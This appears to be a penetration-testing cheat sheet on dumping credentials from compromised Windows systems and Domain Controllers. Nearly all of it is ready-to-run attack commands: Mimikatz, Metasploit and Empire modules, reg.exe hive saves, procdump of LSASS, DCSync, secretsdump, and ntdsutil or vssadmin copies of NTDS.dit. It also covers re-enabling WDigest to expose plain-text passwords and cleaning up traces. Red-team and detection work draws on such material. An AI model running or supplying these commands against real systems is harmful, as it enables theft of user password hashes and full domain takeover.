System

Collect system credentials on a compromised Windows standard system or Windows Domain Controller.


SAM Hive

Windows systems store local accounts hashes in the SAM hive located at C:\Windows\System32\config\SAM and HKLM\SAM. Those hashes are encrypted using the SysKey bootkey located in C:\Windows\System32\SYSTEM and HKLM\SYSTEM. Both SAM and SYSTEM files located in C:\Windows\System32\config are locked and cannot be read on a live system.

Parse both hives locally using one of the following tool.

samdump2 [SYSTEM] [SAM]
secretsdump.py -sam [/path/to/SAM] -system [/path/to/SYSTEM] LOCAL

Physical Access

If you have physical access and the system does not have full disk encryption, boot on a live Linux OS, mount the filesystem and simply copy both SECURITY and SYSTEM hives.

Shell Access - reg.exe

Simply copy both SAM and SYSTEM hives from the registry using reg.exe then parse them using the above tool.

reg.exe save hklm\sam [C:\path\to\output\file]
reg.exe save hklm\system [C:\path\to\output\file]

Mimikatz - lsadump::sam

Gets the SysKey to decrypt SAM entries (from registry or hives).

lsadump::sam

Metasploit - smart_hashdump

If the target is not a Domain Controller, the smart_hashdump module tries to extract hashes from the SAM database and fallback to injecting the LSASS memory if it fails.

use post/windows/gather/smart_hashdump

It seems the hashdump command of a meterpreter session now uses the same module.

Empire - sam

Uses PowerSploit’s Invoke-Mimikatz function to extract hashes from the SAM database.

interact [AGENT_NAME]
usemodule credentials/mimikatz/sam

Cache

In a Windows domain, credentials are cached (up to 10) in case a Domain Controller is unavailable for authentication. These credentials are stored in the SECURITY hive and are encrypted using the SysKey from the SYSTEM hive. The hash format are MSCacheV1 or MSCacheV2.

Parse both hives locally using the Impacket secretsdump.py tool.

secrets.py -security [SECURITY] -system [SYSTEM] LOCAL

Physical Access

If you have physical access and the system does not have full disk encryption, boot on a live Linux OS, mount the filesystem and simply copy both SECURITY and SYSTEM hives.

Shell Access - reg.exe

Copy both SECURITY and SYSTEM hives using reg.exe and retrieve it on the attacker machine.

reg.exe save hklm\security [C:\path\to\output]
reg.exe save hklm\system [C:\path\to\output]

Mimikatz - sekurlsa::cache

Get the SysKey to decrypt NL$KM then MSCache from registry or hive.

lsadump::cache

Metasploit - cachedump

The cachedump module uses the registry to extract the stored domain hashes.

run post/windows/gather/cachedump

Empire - cache

Runs PowerSploit’s Invoke-Mimikatz function to extract MSCache hashes.

interact [AGENT_NAME]
usemodule credentials/mimikatz/cache

LSASS

LSASS is the process that holds passwords, keys, pin codes, tickets and of users in memory. It is possible to extract those sensitive information either by injecting into the process or dumping its memory and parsing it offline.

In order to be able to interact with the lsass.exe process, you need to be either:

Injecting into LSASS might be dangerous on busy systems such as Domain Controllers or Terminal Servers and might crash the system. When not sure, dump the process memory and parse it offline.

SAM/NTDS

Ask the LSA server to retrieve all SAM/NTDS entries. This will basically give the same information as reading the SAM database or NTDS.dit file but through the LSASS process.

This one is very risky and might crash the system if run on a Domain Controller managing a large domain.

Mimikatz - lsadump::lsa

There are two methods of performing this techniques:

Since it requires PROCESS_CREATE_THREAD to perform the /inject technique, it has more chance of being catched in well-monitored environment. However, /patch only displays LM and NT hashes while /inject also displays WDigest and Kerberos keys.

lsadump::lsa /inject
lsadump::lsa /patch 

Use the additional options to limit the query for a specific account.

lsadump::lsa /patch /id:[ACCOUNT_ID]
lsadump::lsa /patch /name:[ACCOUNT_NAME]

Reference: https://blog.3or.de/mimikatz-deep-dive-on-lsadumplsa-patch-and-inject.html

Metasploit - smart_hashdump

The smart_hashdump metasploit module performs the same injection technique on Domain Controllers only or on other systems where reading the Registry (SAM) is not possible.

use post/windows/gather/smart_hashdump

It seems the hashdump command of a meterpreter session now uses the same module.

Reference: https://www.darkoperator.com/blog/2011/5/19/metasploit-post-module-smart_hashdump.html

Meterpreter - kiwi - lsa_dump_sam

The kiwi meterpreter module has a lsa_dump_sam command that also performs the same injection technique.

load kiwi
lsa_dump_sam
Empire - lsadump

The lsadump Empire module performs the /patch technique and also allows to specify specific accounts. It will dump all accounts hashes if no username is specified.

interact [AGENT_NAME]
usemodule credentials/mimikatz/lsadump

Credentials Providers

Windows natively supports many different authentication protocols and providers to be compatible with a range variety of services. In order to provide a Single-Sign-On experience, it stores the credentials for all providers in LSASS memory. As some providers require the password to perform the authentication, it might be stored in plain-text.

Store Description
MSV Classic LM and NT hashes used for NTLM authentication.
WDigest WDigest is a DLL first added in Windows XP that is used to authenticate users against HTTP Digest authentication and Simple Authentication Security Layer (SASL) exchanges. Both of these require the user’s plain-text password.
Kerberos Kerberos automatically delegate a user’s Active Directory credentials from a client to a target server.
TsPkg Provides single-sign-on functionality to terminal servers.
LiveSSP & SSP The Credential Security Support Provider (CredSSP) enables an application to securely delegate a user’s credentials (password or smart card PIN) from a client to a target server. The difference with Kerberos is that the user has some control over wether the delegation should occur and what credentials should be used. Thus, those credentials might be different from Active Directory.
CredMan When a web site or another computer requests authentication through NTLM or Kerberos, an Update Default Credentials or Save Password check box appears in the Net UI dialog box. If the user selects the check box, the Credential Manager keeps track of the user’s name, password, and related information for the authentication service in use. Thus, those credentials might be different from Active Directory.

See post/windows/manage/wdigest_caching metasploit module and powershell/management/wdigest_downgrade Empire module to enable WDigest on patched systems.

Except for MSV, we usually don’t know what credential provider is present in memory. Thus, most tools mentioned below try to extract credentials from all of them.

Mimikatz - sekurlsa
sekurlsa::logonPasswords

See also sekurlsa::msv, sekurlsa::wdigest, sekurlsa::tspkg, sekurlsa::livessp, sekurlsa::ssp and sekurlsa::credman for specific providers.

Meterpreter - kiwi
load kiwi
creds_all

See also creds_msv, creds_wdigest, creds_kerberos and creds_tspkg for specific providers.

Empire - logonpasswords
interact [AGENT_NAME]
usemodule credentials/mimikatz/logonpasswords

See also credentials/mimikatz/command and the above Mimikatz commands for specific providers.

Offline - procdump

As the credentials are collected from the LSASS memory, it is also possible to create a dump of the lsass.exe process and parse it offline. Use the procdump utility from SysInternals.

procdump.exe -accepteula -ma lsass.exe [OUTFILE.dmp]

Then, load it in Mimikatz and use the above commands to parse the credentials.

sekurlsa::minidump [OUTFILE.dmp]

Domain Controller Only

Active Directory stores NTLM hashes in C:\Windows\NTDS\NTDS.dit. This file is encrypted with a key stored in the C:\Windows\System32\config\SYSTEM registry hive. Both NTDS.dit and SYSTEM cannot be read directly as they are always in use by the OS.

DC Replication Services (dcsync)

This feature allows the attacker to pull the password hash, as well as previous password hashes, from a Domain Controller over the network without requiring interactive logon or copying off the Active Directory database file (ntds.dit). Any member of Administrators, Domain Admins or Enterprise Admins as well as Domain Controller computer accounts are able to run DCSync to pull password data from any computer within the domain.

Only collecting the krbtgt account hash is enough to fully compromise the domain (see Golden Tickets).

Mimikatz

Collect detailed information for a specific account (including hashes):

lsadump::dcsync /domain:[FQDN_DOMAIN] /user:[ACCOUNT]

Collect LM/NT hashes of all users:

lsadump::dcsync /domain:[FQDN_DOMAIN] /all /csv
Impacket secretsdump.py

The Impacket secretsdump.py allows you to perform the same operation from the remote attacker machine outide the domain by targetting the Domain Controller using valid credentials.

Collect detailed information for a specific account (including hashes):

impacket-secretsdump -just-dc-user [ACCOUNT] [DOMAIN]/[USERNAME]:[PASSWORD]@[TARGET]

Collect LM/NT hashes of all users:

impacket-secretsdump -just-dc [DOMAIN]/[USERNAME]:[PASSWORD]@[TARGET]
Empire

The following modules uses the Invoke-Mimikatz powershell function (from PowerSploit) to run the above Mimikatz commands.

Collect detailed information for a specific account (including hashes):

usemodule powershell/credentials/mimikatz/dcsync

Collect LM/NT hashes of all users:

usemodule powershell/credentials/mimikatz/dcsync_hashdump
Invoke-DCSync

Use the Invoke-DCSync.ps1 standalone module from the Empire framework to load a Mimikatz DLL in memory and call DCSync.

Collect detailed information for a specific account (including hashes):

Invoke-DCSync -AllData -Users [ACCOUNT]

Collect LM/NT hashes of all users:

Invoke-DCSync -PWDumpFormat

Use Invoke-DCSync from a Meterpreter session:

load powershell
powershell_import [/path/to/Invoke-DCSync.ps1]
powershell_execute Invoke-DCSync [see above for options]

Use Invoke-DCSync from an Empire agent:

scriptimport [/path/to/Invoke-DCSync.ps1]
scriptcmd Invoke-DCSync [see above for options]

Volume Shadow Copy

This technique performs a copy of the locked NTDS.dit and SYSTEM files in order to allow the attacker to read them and thus parse NTLM hashes. As those files are stored on Domain Controllers only, it requires some kind of access to a DC on the targetted domain.

Once both files have been retrieved, parse them locally using Impacket secretsdump.py.

secretsdump.py -ntds [/path/to/NTDS.dit] -system [/path/to/SYSTEM] LOCAL

On Kali Linux, impacket secretsdump.py has a different name: impacket-secretsdump.

Reference: https://blog.ropnop.com/extracting-hashes-and-domain-info-from-ntds-dit/

Impacket secretsdump.py

The Impacket secretsdump.py tool automates this process remotely and can be run directly from the attacker machine by targetting the DC.

secretsdump.py -just-dc -use-vss [DOMAIN]/[USERNAME]:[PASSWORD]@[HOSTNAME]
Metasploit - domain_hashdump

The domain_hashdump module automates this process without the need to download and parse the files on the attacker system. Instead, it uses the JET API to parse hashes in bulk of 20 on target DC from the copied NTDS.dit file.

use post/windows/gather/credentials/domain_hashdump

It happens that this module fails during the NTDS.dit parsing and stops before cleaning the VSS copy. In that case, make sure you clean everything in C:\Windows\Temp manually.

NTDSUtil

Native command-line tool that provides management facilities for Active Directory and is available by default on every DC (stealth).

ntdsutil
activate instance ntds
ifm
create full [C:\path\to\output\folder]
quit
quit

The above commands will create a copy of NTDS.dit in C:\path\to\output\folder\Active Directory and a copy of SYSTEM in C:\path\to\output\folder\registry.

VSSAdmin

Native command-line tool to manage Volume Shadow Copies. First, create the VSS and write down its ID and name.

vssadmin create shadow /for=C:
    Shadow Copy ID: {e3e6bc3e-9402-4bca-9016-d1076d45dc70}
    Shadow Copy Name: \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy8

Copy both NTDS.dit and SYSTEM to the standard file system.

copy [VSS_NAME]\Windows\NTDS\NTDS.dit [C:\path\to\output\folder]
copy [VSS_NAME]\Windows\System32\config\SYSTEM [C:\path\to\output\folder]

Clean after yourself by deleting the VSS.

vssadmin delete shadows /Shadows=[VSS_ID] /Quiet